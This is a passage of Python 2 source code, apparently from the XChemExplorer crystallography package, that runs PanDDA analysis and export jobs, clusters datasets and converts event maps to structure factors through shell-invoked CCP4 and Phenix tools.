# these are hopefully legacy cases which are from before this extensive check was introduced (13/01/2017)
advice = ( 'The pandda model of '+xtal+' was changed, but it was already refined! '
'This is most likely because this was done with an older version of XCE. '
'If you really want to export and refine this model, you need to open the database '
'with DBbroweser (sqlitebrowser.org); then change the RefinementOutcome field '
'of the respective sample to "2 - PANDDA model", save the database and repeat the export prodedure.' )
self.Logfile.insert(advice)
else:
self.Logfile.insert('exporting '+sample+' -> first time to be exported and refined')
samples_to_export[sample]=fileModelsDict[sample]
# update the DB:
# set timestamp to current timestamp of file and set RefinementOutcome to '2-pandda...'
if samples_to_export != {}:
select_dir_string=''
select_dir_string_new_pannda=' '
for sample in samples_to_export:
db_dict= {'RefinementOutcome': '2 - PANDDA model', 'DatePanDDAModelCreated': samples_to_export[sample]}
select_dir_string+="select_dir={0!s} ".format(sample)
select_dir_string_new_pannda+='{0!s} '.format(sample)
self.Logfile.insert('updating database for '+sample+' setting time model was created to '+db_dict['DatePanDDAModelCreated']+' and RefinementOutcome to '+db_dict['RefinementOutcome'])
self.db.update_data_source(sample,db_dict)
if os.path.isdir(os.path.join(self.panddas_directory,'rejected_datasets')):
Cmds = (
'pandda.export'
' pandda_dir=%s' %self.panddas_directory+
' export_dir={0!s}'.format(self.initial_model_directory)+
' {0!s}'.format(select_dir_string)+
' export_ligands=False'
' generate_occupancy_groupings=True\n'
)
else:
Cmds = (
'source /dls/science/groups/i04-1/software/pandda-update/ccp4/ccp4-7.0/bin/ccp4.setup-sh\n'
# 'source '+os.path.join(os.getenv('XChemExplorer_DIR'),'setup-scripts','pandda.setup-sh')+'\n'
'pandda.export'
' pandda_dir=%s' %self.panddas_directory+
' export_dir={0!s}'.format(self.initial_model_directory)+
' {0!s}'.format(select_dir_string_new_pannda)+
' generate_restraints=True\n'
)
self.Logfile.insert('running pandda.export with the following settings:\n'+Cmds)
os.system(Cmds)
return samples_to_export
class run_pandda_analyse(QtCore.QThread):
def __init__(self,pandda_params,xce_logfile,datasource):
QtCore.QThread.__init__(self)
self.data_directory=pandda_params['data_dir']
self.panddas_directory=pandda_params['out_dir']
self.submit_mode=pandda_params['submit_mode']
self.pandda_analyse_data_table = pandda_params['pandda_table']
self.nproc=pandda_params['nproc']
self.min_build_datasets=pandda_params['min_build_datasets']
self.pdb_style=pandda_params['pdb_style']
self.mtz_style=pandda_params['mtz_style']
self.sort_event=pandda_params['sort_event']
self.number_of_datasets=pandda_params['N_datasets']
self.max_new_datasets=pandda_params['max_new_datasets']
self.grid_spacing=pandda_params['grid_spacing']
self.reference_dir=pandda_params['reference_dir']
self.filter_pdb=os.path.join(self.reference_dir,pandda_params['filter_pdb'])
self.wilson_scaling = pandda_params['perform_diffraction_data_scaling']
self.Logfile=XChemLog.updateLog(xce_logfile)
self.datasource=datasource
self.db=XChemDB.data_source(datasource)
self.appendix=pandda_params['appendix']
self.write_mean_maps=pandda_params['write_mean_map']
self.calc_map_by = pandda_params['average_map']
self.select_ground_state_model=''
projectDir = self.data_directory.replace('/*', '')
self.make_ligand_links='$CCP4/bin/ccp4-python %s %s %s\n' %(os.path.join(os.getenv('XChemExplorer_DIR'),
'helpers',
'make_ligand_links_after_pandda.py')
,projectDir,self.panddas_directory)
self.use_remote = pandda_params['use_remote']
self.remote_string = pandda_params['remote_string']
if self.appendix != '':
self.panddas_directory=os.path.join(self.reference_dir,'pandda_'+self.appendix)
if os.path.isdir(self.panddas_directory):
os.system('/bin/rm -fr %s' %self.panddas_directory)
os.mkdir(self.panddas_directory)
if self.data_directory.startswith('/dls'):
self.select_ground_state_model = 'module load ccp4\n'
self.select_ground_state_model +='$CCP4/bin/ccp4-python %s %s\n' %(os.path.join(os.getenv('XChemExplorer_DIR'),'helpers','select_ground_state_dataset.py'),self.panddas_directory)
self.make_ligand_links=''
def run(self):
# print self.reference_dir
# print self.filter_pdb
# how to run pandda.analyse on large datasets
#
# 1) Run the normal pandda command, with the new setting, e.g.
# pandda.analyse data_dirs=... max_new_datasets=500
# This will do the analysis on the first 500 datasets and build the statistical maps - just as normal.
#
# 2) Run pandda with the same command:
# pandda.analyse data_dirs=... max_new_datasets=500
# This will add 500 new datasets, and process them using the existing statistical maps
# (this will be quicker than the original analysis). It will then merge the results of the two analyses.
#
# 3) Repeat 2) until you don't add any "new" datasets. Then you can build the models as normal.
number_of_cyles=int(self.number_of_datasets)/int(self.max_new_datasets)
if int(self.number_of_datasets) % int(self.max_new_datasets) != 0: # modulo gives remainder after integer division
number_of_cyles+=1
self.Logfile.insert('will run %s rounds of pandda.analyse' %str(number_of_cyles))
if os.path.isfile(os.path.join(self.panddas_directory,'pandda.running')):
self.Logfile.insert('it looks as if a pandda.analyse job is currently running in: '+self.panddas_directory)
msg = ( 'there are three possibilities:\n'
'1.) choose another PANDDA directory\n'
'2.) - check if the job is really running either on the cluster (qstat) or on your local machine\n'
' - if so, be patient and wait until the job has finished\n'
'3.) same as 2., but instead of waiting, kill the job and remove at least the pandda.running file\n'
' (or all the contents in the directory if you want to start from scratch)\n' )
self.Logfile.insert(msg)
return None
else:
# if os.getenv('SHELL') == '/bin/tcsh' or os.getenv('SHELL') == '/bin/csh':
# source_file=os.path.join(os.getenv('XChemExplorer_DIR'),'setup-scripts','pandda.setup-csh\n')
# elif os.getenv('SHELL') == '/bin/bash' or self.use_remote:
# source_file='export XChemExplorer_DIR="'+os.getenv('XChemExplorer_DIR')+'"\n'
# source_file+='source %s\n' %os.path.join(os.getenv('XChemExplorer_DIR'),'setup-scripts','pandda.setup-sh\n')
# else:
# source_file=''
# v1.2.1 - pandda.setup files should be obsolete now that pandda is part of ccp4
# 08/10/2020 - pandda v0.2.12 installation at DLS is obsolete
# source_file='source /dls/science/groups/i04-1/software/pandda_0.2.12/ccp4/ccp4-7.0/bin/ccp4.setup-sh\n'
source_file = ''
source_file += 'export XChemExplorer_DIR="' + os.getenv('XChemExplorer_DIR') + '"\n'
if os.path.isfile(self.filter_pdb + '.pdb'):
print('filter pdb located')
filter_pdb=' filter.pdb='+self.filter_pdb+'.pdb'
print('will use ' + filter_pdb + 'as a filter for pandda.analyse')
else:
if self.use_remote:
stat_command = self.remote_string.replace("qsub'", str('stat ' + self.filter_pdb + "'"))
output = subprocess.Popen(stat_command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
out, err = output.communicate()
print out
if 'cannot stat' in out:
filter_pdb = ''
else:
filter_pdb = ' filter.pdb=' + self.filter_pdb + '.pdb'
else:
filter_pdb=''
os.chdir(self.panddas_directory)
# note: copied latest pandda.setup-sh from XCE2 installation (08/08/2017)
dls = ''
if self.data_directory.startswith('/dls'):
dls = (
source_file +
'\n'
'module load pymol/1.8.2.0\n'
'\n'
'module load ccp4/7.0.072\n'
'\n'
)
Cmds = (
'#!'+os.getenv('SHELL')+'\n' +
'\n' +
dls +
'cd ' + self.panddas_directory + '\n' +
'\n'
)
ignore = []
char = []
zmap = []
for i in range(0, self.pandda_analyse_data_table.rowCount()):
ignore_all_checkbox = self.pandda_analyse_data_table.cellWidget(i, 7)
ignore_characterisation_checkbox = self.pandda_analyse_data_table.cellWidget(i, 8)
ignore_zmap_checkbox = self.pandda_analyse_data_table.cellWidget(i, 9)
if ignore_all_checkbox.isChecked():
ignore.append(str(self.pandda_analyse_data_table.item(i, 0).text()))
if ignore_characterisation_checkbox.isChecked():
char.append(str(self.pandda_analyse_data_table.item(i, 0).text()))
if ignore_zmap_checkbox.isChecked():
zmap.append(str(self.pandda_analyse_data_table.item(i, 0).text()))
print ignore
def append_to_ignore_string(datasets_list, append_string):
if len(datasets_list)==0:
append_string = ''
for i in range(0, len(datasets_list)):
if i < len(datasets_list)-1:
append_string += str(datasets_list[i] + ',')
else:
append_string += str(datasets_list[i] +'"')
print(append_string)
return append_string
ignore_string = 'ignore_datasets="'
ignore_string = append_to_ignore_string(ignore, ignore_string)
char_string = 'exclude_from_characterisation="'
char_string = append_to_ignore_string(char, char_string)
zmap_string = 'exclude_from_z_map_analysis="'
zmap_string = append_to_ignore_string(zmap, zmap_string)
for i in range(number_of_cyles):
Cmds += (
'pandda.analyse '+
' data_dirs="'+self.data_directory.replace('/*','')+'/*"'+
' out_dir="'+self.panddas_directory+'"'
' min_build_datasets='+self.min_build_datasets+
' max_new_datasets='+self.max_new_datasets+
' grid_spacing='+self.grid_spacing+
' cpus='+self.nproc+
' events.order_by='+self.sort_event+
filter_pdb+
' pdb_style='+self.pdb_style+
' mtz_style='+self.mtz_style+
' lig_style=/compound/*.cif'+
' apply_b_factor_scaling='+self.wilson_scaling+
' write_average_map='+self.write_mean_maps +
' average_map=' + self.calc_map_by +
' ' +
ignore_string +' '+
char_string +' '+
zmap_string +' '+
'\n'
)
Cmds += self.select_ground_state_model
Cmds += self.make_ligand_links
Cmds += '\n'
data_dir_string = self.data_directory.replace('/*', '')
Cmds += str(
'find ' + data_dir_string +
'/*/compound -name "*.cif" | while read line; do echo ${line//"' +
data_dir_string + '"/"' + self.panddas_directory +
'/processed_datasets/"}| while read line2; do cp $line ${line2//compound/ligand_files} > /dev/null 2>&1; '
'done; done;')
Cmds += '\n'
Cmds += str(
'find ' + data_dir_string +
'/*/compound -name "*.pdb" | while read line; do echo ${line//"' +
data_dir_string + '"/"' + self.panddas_directory +
'/processed_datasets/"}| while read line2; do cp $line ${line2//compound/ligand_files} > /dev/null 2>&1; '
'done; done;')
self.Logfile.insert('running pandda.analyse with the following command:\n'+Cmds)
f = open('pandda.sh','w')
f.write(Cmds)
f.close()
# #>>> for testing
# self.submit_mode='local machine'
self.Logfile.insert('trying to run pandda.analyse on ' + str(self.submit_mode))
if self.submit_mode=='local machine':
self.Logfile.insert('running PANDDA on local machine')
os.system('chmod +x pandda.sh')
os.system('./pandda.sh &')
elif self.use_remote:
# handles remote submission of pandda.analyse jobs
submission_string = self.remote_string.replace("qsub'",
str('cd ' +
self.panddas_directory +
'; ' +
"qsub -P labxchem -q medium.q -N pandda 5 -l exclusive,m_mem_free=100G pandda.sh'"))
os.system(submission_string)
self.Logfile.insert(str('running PANDDA remotely, using: ' + submission_string))
else:
self.Logfile.insert('running PANDDA on cluster, using qsub...')
os.system('qsub -P labxchem -q medium.q -N pandda -l exclusive,m_mem_free=100G pandda.sh')
self.emit(QtCore.SIGNAL('datasource_menu_reload_samples'))
class giant_cluster_datasets(QtCore.QThread):
def __init__(self,initial_model_directory,pandda_params,xce_logfile,datasource,):
QtCore.QThread.__init__(self)
self.panddas_directory=pandda_params['out_dir']
self.pdb_style=pandda_params['pdb_style']
self.mtz_style=pandda_params['mtz_style']
self.Logfile=XChemLog.updateLog(xce_logfile)
self.initial_model_directory=initial_model_directory
self.db=XChemDB.data_source(datasource)
def run(self):
self.emit(QtCore.SIGNAL('update_progress_bar'), 0)
if self.pdb_style.replace(' ','') == '':
self.Logfile.insert('PDB style is not set in pandda.analyse!')
self.Logfile.insert('cannot start pandda.analyse')
self.emit(QtCore.SIGNAL('update_status_bar(QString)'), 'PDB style is not set in pandda.analyse!')
return None
if self.mtz_style.replace(' ','') == '':
self.Logfile.insert('MTZ style is not set in pandda.analyse!')
self.Logfile.insert('cannot start pandda.analyse')
self.emit(QtCore.SIGNAL('update_status_bar(QString)'), 'MTZ style is not set in pandda.analyse!')
return None
# 1.) prepare output directory
os.chdir(self.panddas_directory)
if os.path.isdir('cluster_analysis'):
self.Logfile.insert('removing old cluster_analysis directory in {0!s}'.format(self.panddas_directory))
self.emit(QtCore.SIGNAL('update_status_bar(QString)'), 'removing old cluster_analysis directory in {0!s}'.format(self.panddas_directory))
os.system('/bin/rm -fr cluster_analysis 2> /dev/null')
self.Logfile.insert('creating cluster_analysis directory in {0!s}'.format(self.panddas_directory))
self.emit(QtCore.SIGNAL('update_status_bar(QString)'), 'creating cluster_analysis directory in {0!s}'.format(self.panddas_directory))
os.mkdir('cluster_analysis')
self.emit(QtCore.SIGNAL('update_progress_bar'), 10)
# 2.) go through project directory and make sure that all pdb files really exist
# broken links derail the giant.cluster_mtzs_and_pdbs script
self.Logfile.insert('cleaning up broken links of {0!s} and {1!s} in {2!s}'.format(self.pdb_style, self.mtz_style, self.initial_model_directory))
self.emit(QtCore.SIGNAL('update_status_bar(QString)'), 'cleaning up broken links of {0!s} and {1!s} in {2!s}'.format(self.pdb_style, self.mtz_style, self.initial_model_directory))
os.chdir(self.initial_model_directory)
for xtal in glob.glob('*'):
if not os.path.isfile(os.path.join(xtal,self.pdb_style)):
self.Logfile.insert('missing {0!s} and {1!s} for {2!s}'.format(self.pdb_style, self.mtz_style, xtal))
os.system('/bin/rm {0!s}/{1!s} 2> /dev/null'.format(xtal, self.pdb_style))
os.system('/bin/rm {0!s}/{1!s} 2> /dev/null'.format(xtal, self.mtz_style))
self.emit(QtCore.SIGNAL('update_progress_bar'), 20)
# 3.) giant.cluster_mtzs_and_pdbs
self.Logfile.insert("running giant.cluster_mtzs_and_pdbs {0!s}/*/{1!s} pdb_regex='{2!s}/(.*)/{3!s}' out_dir='{4!s}/cluster_analysis'".format(self.initial_model_directory, self.pdb_style, self.initial_model_directory, self.pdb_style, self.panddas_directory))
self.emit(QtCore.SIGNAL('update_status_bar(QString)'), 'running giant.cluster_mtzs_and_pdbs')
if os.getenv('SHELL') == '/bin/tcsh' or os.getenv('SHELL') == '/bin/csh':
source_file=os.path.join(os.getenv('XChemExplorer_DIR'),'setup-scripts','pandda.setup-csh')
elif os.getenv('SHELL') == '/bin/bash':
source_file=os.path.join(os.getenv('XChemExplorer_DIR'),'setup-scripts','pandda.setup-sh')
else:
source_file=''
Cmds = (
'#!'+os.getenv('SHELL')+'\n'
'unset PYTHONPATH\n'
'source '+source_file+'\n'
"giant.datasets.cluster %s/*/%s pdb_regex='%s/(.*)/%s' out_dir='%s/cluster_analysis'" %(self.initial_model_directory,self.pdb_style,self.initial_model_directory,self.pdb_style,self.panddas_directory)
)
# os.system("giant.cluster_mtzs_and_pdbs %s/*/%s pdb_regex='%s/(.*)/%s' out_dir='%s/cluster_analysis'" %(self.initial_model_directory,self.pdb_style,self.initial_model_directory,self.pdb_style,self.panddas_directory))
os.system(Cmds)
self.emit(QtCore.SIGNAL('update_progress_bar'), 80)
# 4.) analyse output
self.Logfile.insert('parsing {0!s}/cluster_analysis'.format(self.panddas_directory))
self.emit(QtCore.SIGNAL('update_status_bar(QString)'), 'parsing {0!s}/cluster_analysis'.format(self.panddas_directory))
os.chdir('{0!s}/cluster_analysis'.format(self.panddas_directory))
cluster_dict={}
for out_dir in sorted(glob.glob('*')):
if os.path.isdir(out_dir):
cluster_dict[out_dir]=[]
for folder in glob.glob(os.path.join(out_dir,'pdbs','*')):
xtal=folder[folder.rfind('/')+1:]
cluster_dict[out_dir].append(xtal)
self.emit(QtCore.SIGNAL('update_progress_bar'), 90)
# 5.) update datasource
self.Logfile.insert('updating datasource with results from giant.cluster_mtzs_and_pdbs')
if cluster_dict != {}:
for key in cluster_dict:
for xtal in cluster_dict[key]:
db_dict= {'CrystalFormName': key}
self.db.update_data_source(xtal,db_dict)
# 6.) finish
self.emit(QtCore.SIGNAL('update_progress_bar'), 100)
self.Logfile.insert('finished giant.cluster_mtzs_and_pdbs')
self.emit(QtCore.SIGNAL('datasource_menu_reload_samples'))
class check_if_pandda_can_run:
# reasons why pandda cannot be run
# - there is currently a job running in the pandda directory
# - min datasets available is too low
# - required input paramters are not complete
# - map amplitude and phase labels don't exist
def __init__(self,pandda_params,xce_logfile,datasource):
self.data_directory=pandda_params['data_dir']
self.panddas_directory=pandda_params['out_dir']
self.min_build_datasets=pandda_params['min_build_datasets']
self.pdb_style=pandda_params['pdb_style']
self.mtz_style=pandda_params['mtz_style']
self.input_dir_structure=pandda_params['pandda_dir_structure']
self.problem_found=False
self.error_code=-1
self.Logfile=XChemLog.updateLog(xce_logfile)
self.db=XChemDB.data_source(datasource)
def number_of_available_datasets(self):
counter=0
for file in glob.glob(os.path.join(self.input_dir_structure,self.pdb_style)):
if os.path.isfile(file):
counter+=1
self.Logfile.insert('pandda.analyse: found {0!s} useable datasets'.format(counter))
return counter
def get_first_dataset_in_project_directory(self):
first_dataset=''
for file in glob.glob(os.path.join(self.input_dir_structure,self.pdb_style)):
if os.path.isfile(file):
first_dataset=file
break
return first_dataset
def compare_number_of_atoms_in_reference_vs_all_datasets(self,refData,dataset_list):
mismatched_datasets=[]
pdbtools=XChemUtils.pdbtools(refData)
refPDB=refData[refData.rfind('/')+1:]
refPDBlist=pdbtools.get_init_pdb_as_list()
n_atom_ref=len(refPDBlist)
for n_datasets,dataset in enumerate(dataset_list):
if os.path.isfile(os.path.join(self.data_directory.replace('*',''),dataset,self.pdb_style)):
n_atom=len(pdbtools.get_pdb_as_list(os.path.join(self.data_directory.replace('*',''),dataset,self.pdb_style)))
if n_atom_ref == n_atom:
self.Logfile.insert('{0!s}: atoms in PDB file ({1!s}): {2!s}; atoms in Reference file: {3!s} ===> OK'.format(dataset, self.pdb_style, str(n_atom), str(n_atom_ref)))
if n_atom_ref != n_atom:
self.Logfile.insert('{0!s}: atoms in PDB file ({1!s}): {2!s}; atoms in Reference file: {3!s} ===> ERROR'.format(dataset, self.pdb_style, str(n_atom), str(n_atom_ref)))
mismatched_datasets.append(dataset)
return n_datasets,mismatched_datasets
def get_datasets_which_fit_to_reference_file(self,ref,reference_directory,cluster_dict,allowed_unitcell_difference_percent):
refStructure=XChemUtils.pdbtools(os.path.join(reference_directory,ref+'.pdb'))
symmRef=refStructure.get_spg_number_from_pdb()
ucVolRef=refStructure.calc_unitcell_volume_from_pdb()
cluster_dict[ref]=[]
cluster_dict[ref].append(os.path.join(reference_directory,ref+'.pdb'))
for dataset in glob.glob(os.path.join(self.data_directory,self.pdb_style)):
datasetStructure=XChemUtils.pdbtools(dataset)
symmDataset=datasetStructure.get_spg_number_from_pdb()
ucVolDataset=datasetStructure.calc_unitcell_volume_from_pdb()
if symmDataset == symmRef:
try:
difference=math.fabs(1-(float(ucVolRef)/float(ucVolDataset)))*100
if difference < allowed_unitcell_difference_percent:
sampleID=dataset.replace('/'+self.pdb_style,'')[dataset.replace('/'+self.pdb_style,'').rfind('/')+1:]
cluster_dict[ref].append(sampleID)
except ZeroDivisionError:
continue
return cluster_dict
def remove_dimple_files(self,dataset_list):
for n_datasets,dataset in enumerate(dataset_list):
db_dict={}
if os.path.isfile(os.path.join(self.data_directory.replace('*',''),dataset,self.pdb_style)):
os.system('/bin/rm '+os.path.join(self.data_directory.replace('*',''),dataset,self.pdb_style))
self.Logfile.insert('{0!s}: removing {1!s}'.format(dataset, self.pdb_style))
db_dict['DimplePathToPDB']=''
db_dict['DimpleRcryst']=''
db_dict['DimpleRfree']=''
db_dict['DimpleResolutionHigh']=''
db_dict['DimpleStatus']='pending'
if os.path.isfile(os.path.join(self.data_directory.replace('*',''),dataset,self.mtz_style)):
os.system('/bin/rm '+os.path.join(self.data_directory.replace('*',''),dataset,self.mtz_style))
self.Logfile.insert('{0!s}: removing {1!s}'.format(dataset, self.mtz_style))
db_dict['DimplePathToMTZ']=''
if db_dict != {}:
self.db.update_data_source(dataset,db_dict)
def analyse_pdb_style(self):
pdb_found=False
for file in glob.glob(os.path.join(self.data_directory,self.pdb_style)):
if os.path.isfile(file):
pdb_found=True
break
if not pdb_found:
self.error_code=1
message=self.warning_messages()
return message
def analyse_mtz_style(self):
mtz_found=False
for file in glob.glob(os.path.join(self.data_directory,self.mtz_style)):
if os.path.isfile(file):
mtz_found=True
break
if not mtz_found:
self.error_code=2
message=self.warning_messages()
return message
def analyse_min_build_dataset(self):
counter=0
for file in glob.glob(os.path.join(self.data_directory,self.mtz_style)):
if os.path.isfile(file):
counter+=1
if counter <= self.min_build_datasets:
self.error_code=3
message=self.warning_messages()
return message
def warning_messages(self):
message=''
if self.error_code==1:
message='PDB file does not exist'
if self.error_code==2:
message='MTZ file does not exist'
if self.error_code==3:
message='Not enough datasets available'
return message
class convert_all_event_maps_in_database(QtCore.QThread):
def __init__(self,initial_model_directory,xce_logfile,datasource):
QtCore.QThread.__init__(self)
self.xce_logfile=xce_logfile
self.Logfile=XChemLog.updateLog(xce_logfile)
self.initial_model_directory=initial_model_directory
self.datasource=datasource
self.db=XChemDB.data_source(datasource)
def run(self):
sqlite = (
'select'
' CrystalName,'
' PANDDA_site_event_map,'
' PANDDA_site_ligand_resname,'
' PANDDA_site_ligand_chain,'
' PANDDA_site_ligand_sequence_number,'
' PANDDA_site_ligand_altLoc '
'from panddaTable '
'where PANDDA_site_event_map not like "event%"'
)
print sqlite
query=self.db.execute_statement(sqlite)
print query
progress_step=1
if len(query) != 0:
progress_step=100/float(len(query))
else:
progress_step=1
progress=0
self.emit(QtCore.SIGNAL('update_progress_bar'), progress)
for item in query:
print item
xtalID=str(item[0])
event_map=str(item[1])
resname=str(item[2])
chainID=str(item[3])
resseq=str(item[4])
altLoc=str(item[5])
if os.path.isfile(os.path.join(self.initial_model_directory,xtalID,'refine.pdb')):
os.chdir(os.path.join(self.initial_model_directory,xtalID))
self.Logfile.insert('extracting ligand ({0!s},{1!s},{2!s},{3!s}) from refine.pdb'.format(str(resname), str(chainID), str(resseq), str(altLoc)))
XChemUtils.pdbtools(os.path.join(self.initial_model_directory,xtalID,'refine.pdb')).save_specific_ligands_to_pdb(resname,chainID,resseq,altLoc)
if os.path.isfile('ligand_{0!s}_{1!s}_{2!s}_{3!s}.pdb'.format(str(resname), str(chainID), str(resseq), str(altLoc))):
ligand_pdb='ligand_{0!s}_{1!s}_{2!s}_{3!s}.pdb'.format(str(resname), str(chainID), str(resseq), str(altLoc))
print os.path.join(self.initial_model_directory,xtalID,ligand_pdb)
else:
self.Logfile.insert('could not extract ligand; trying next...')
continue
else:
self.Logfile.insert('directory: '+os.path.join(self.initial_model_directory,xtalID)+' -> cannot find refine.pdb; trying next')
continue
if os.path.isfile(os.path.join(self.initial_model_directory,xtalID,'refine.mtz')):
resolution=XChemUtils.mtztools(os.path.join(self.initial_model_directory,xtalID,'refine.mtz')).get_high_resolution_from_mtz()
else:
self.Logfile.insert('directory: '+os.path.join(self.initial_model_directory,xtalID)+' -> cannot find refine.mtz; trying next')
continue
self.emit(QtCore.SIGNAL('update_status_bar(QString)'), 'eventMap -> SF for '+event_map)
convert_event_map_to_SF(self.initial_model_directory,xtalID,event_map,ligand_pdb,self.xce_logfile,self.datasource,resolution).run()
progress += progress_step
self.emit(QtCore.SIGNAL('update_progress_bar'), progress)
class convert_event_map_to_SF:
def __init__(self,project_directory,xtalID,event_map,ligand_pdb,xce_logfile,db_file,resolution):
self.Logfile=XChemLog.updateLog(xce_logfile)
self.event_map=event_map
if not os.path.isfile(self.event_map):
self.Logfile.insert('cannot find Event map: '+self.event_map)
self.Logfile.insert('cannot convert event_map to structure factors!')
return None
self.project_directory=project_directory
self.xtalID=xtalID
self.event_map=event_map
self.ligand_pdb=ligand_pdb
self.event=event_map[event_map.rfind('/')+1:].replace('.map','').replace('.ccp4','')
self.db=XChemDB.data_source(db_file)
self.resolution=resolution
def run(self):
os.chdir(os.path.join(self.project_directory,self.xtalID))
# remove exisiting mtz file
if os.path.isfile(self.event+'.mtz'):
self.Logfile.insert('removing existing '+self.event+'.mtz')
os.system('/bin/rm '+self.event+'.mtz')
# event maps generated with pandda v0.2 or higher have the same symmetry as the crystal
# but phenix.map_to_structure_facors only accepts maps in spg P1
# therefore map is first expanded to full unit cell and spg of map then set tp p1
# other conversion option like cinvfft give for whatever reason uninterpretable maps
self.convert_map_to_p1()
# run phenix.map_to_structure_factors
self.run_phenix_map_to_structure_factors()
self.remove_and_rename_column_labels()
# check if output files exist
if not os.path.isfile('{0!s}.mtz'.format(self.event)):
self.Logfile.insert('cannot find {0!s}.mtz'.format(self.event))
else:
self.Logfile.insert('conversion successful, {0!s}.mtz exists'.format(self.event))
# update datasource with event_map_mtz information
self.update_database()
def calculate_electron_density_map(self,mtzin):
missing_columns=False
column_dict=XChemUtils.mtztools(mtzin).get_all_columns_as_dict()
if 'FWT' in column_dict['F'] and 'PHWT' in column_dict['PHS']:
labin=' labin F1=FWT PHI=PHWT\n'
elif '2FOFCWT' in column_dict['F'] and 'PH2FOFCWT' in column_dict['PHS']:
labin=' labin F1=2FOFCWT PHI=PH2FOFCWT\n'
else:
missing_columns=True
if not missing_columns:
os.chdir(os.path.join(self.project_directory,self.xtalID))
cmd = (
'fft hklin '+mtzin+' mapout 2fofc.map << EOF\n'
+labin+
'EOF\n'
)
self.Logfile.insert('calculating 2fofc map from '+mtzin)
os.system(cmd)
else:
self.Logfile.insert('cannot calculate 2fofc.map; missing map coefficients')
def prepare_conversion_script(self):
os.chdir(os.path.join(self.project_directory, self.xtalID))
# see also:
# http://www.phaser.cimr.cam.ac.uk/index.php/Using_Electron_Density_as_a_Model
if os.getcwd().startswith('/dls'):
phenix_module='module_load_phenix\n'
else:
phenix_module=''
cmd = (
'#!'+os.getenv('SHELL')+'\n'
'\n'
+phenix_module+
'\n'
'pdbset XYZIN %s XYZOUT mask_ligand.pdb << eof\n' %self.ligand_pdb+
' SPACEGROUP {0!s}\n'.format(self.space_group)+
' CELL {0!s}\n'.format((' '.join(self.unit_cell)))+
' END\n'
'eof\n'
'\n'
'ncsmask XYZIN mask_ligand.pdb MSKOUT mask_ligand.msk << eof\n'
' GRID %s\n' %(' '.join(self.gridElectronDensityMap))+
' RADIUS 10\n'
' PEAK 1\n'
'eof\n'
'\n'
'mapmask MAPIN %s MAPOUT onecell_event_map.map << eof\n' %self.event_map+
' XYZLIM CELL\n'
'eof\n'
'\n'
'maprot MAPIN onecell_event_map.map MSKIN mask_ligand.msk WRKOUT masked_event_map.map << eof\n'
' MODE FROM\n'
' SYMMETRY WORK %s\n' %self.space_group_numberElectronDensityMap+
' AVERAGE\n'
' ROTATE EULER 0 0 0\n'
' TRANSLATE 0 0 0\n'
'eof\n'
'\n'
'mapmask MAPIN masked_event_map.map MAPOUT masked_event_map_fullcell.map << eof\n'
' XYZLIM CELL\n'
' PAD 0.0\n'
'eof\n'
'\n'
'sfall HKLOUT %s.mtz MAPIN masked_event_map_fullcell.map << eof\n' %self.event+
' LABOUT FC=FC_event PHIC=PHIC_event\n'
' MODE SFCALC MAPIN\n'
' RESOLUTION %s\n' %self.resolution+
' END\n'
)
self.Logfile.insert('preparing script for conversion of Event map to SF')
f = open('eventMap2sf.sh','w')
f.write(cmd)
f.close()
os.system('chmod +x eventMap2sf.sh')
def run_conversion_script(self):
self.Logfile.insert('running conversion script...')
os.system('./eventMap2sf.sh')
def convert_map_to_p1(self):
self.Logfile.insert('running mapmask -> converting map to p1...')
cmd = ( '#!'+os.getenv('SHELL')+'\n'
'\n'
'mapmask mapin %s mapout %s_p1.map << eof\n' %(self.event_map,self.event) +
'xyzlin cell\n'
'symmetry p1\n' )
self.Logfile.insert('mapmask command:\n%s' %cmd)
os.system(cmd)
def run_phenix_map_to_structure_factors(self):
if float(self.resolution) < 1.21: # program complains if resolution is 1.2 or higher
self.resolution='1.21'
self.Logfile.insert('running phenix.map_to_structure_factors {0!s}_p1.map d_min={1!s} output_file_name={2!s}_tmp.mtz'.format(self.event, self.resolution, self.event))
os.system('phenix.map_to_structure_factors {0!s}_p1.map d_min={1!s} output_file_name={2!s}_tmp.mtz'.format(self.event, self.resolution, self.event))
def run_cinvfft(self,mtzin):
# mtzin is usually refine.mtz
self.Logfile.insert('running cinvfft -mapin {0!s} -mtzin {1!s} -mtzout {2!s}_tmp.mtz -colout event'.format(self.event_map, mtzin, self.event))
os.system('cinvfft -mapin {0!s} -mtzin {1!s} -mtzout {2!s}_tmp.mtz -colout event'.format(self.event_map, mtzin, self.event))
def remove_and_rename_column_labels(self):
cmd = ( '#!'+os.getenv('SHELL')+'\n'
'\n'
'cad hklin1 %s_tmp.mtz hklout %s.mtz << eof\n' %(self.event,self.event)+
' labin file_number 1 E1=F-obs E2=PHIF\n'
' labout file_number 1 E1=F_ampl E2=PHIF\n'
'eof\n'
'\n' )
self.Logfile.insert('running CAD: new column labels F_ampl,PHIF')
os.system(cmd)
def remove_and_rename_column_labels_after_cinvfft(self):
cmd = ( '#!'+os.getenv('SHELL')+'\n'
'\n'
'cad hklin1 %s_tmp.mtz hklout %s.mtz << eof\n' %(self.event,self.event)+
' labin file_number 1 E1=event.F_phi.F E2=event.F_phi.phi\n'
' labout file_number 1 E1=F_ampl E2=PHIF\n'
'eof\n'
'\n' )
self.Logfile.insert('running CAD: renaming event.F_phi.F -> F_ampl and event.F_phi.phi -> PHIF')
os.system(cmd)
def update_database(self):
sqlite = ( "update panddaTable set "
" PANDDA_site_event_map_mtz = '%s' " %os.path.join(self.project_directory,self.xtalID,self.event+'.mtz')+
" where PANDDA_site_event_map is '{0!s}' ".format(self.event_map)
)
self.db.execute_statement(sqlite)
self.Logfile.insert('updating data source: '+sqlite)
def clean_output_directory(self):
os.system('/bin/rm mask_targetcell.pdb')
os.system('/bin/rm mask_targetcell.msk')
os.system('/bin/rm onecell.map')
os.system('/bin/rm masked_targetcell.map')
os.system('/bin/rm masked_fullcell.map')
os.system('/bin/rm eventMap2sf.sh')
os.system('/bin/rm '+self.ligand_pdb)
class run_pandda_inspect_at_home(QtCore.QThread):
def __init__(self,panddaDir,xce_logfile):
QtCore.QThread.__init__(self)
self.panddaDir=panddaDir
self.Logfile=XChemLog.updateLog(xce_logfile)
def run(self):
os.chdir(os.path.join(self.panddaDir,'processed_datasets'))
progress_step=1
if len(glob.glob('*')) != 0:
progress_step=100/float(len(glob.glob('*')))
else:
progress_step=1
progress=0
self.emit(QtCore.SIGNAL('update_progress_bar'), progress)
self.Logfile.insert('parsing '+self.panddaDir)
for xtal in sorted(glob.glob('*')):
for files in glob.glob(xtal+'/ligand_files/*'):
if os.path.islink(files):
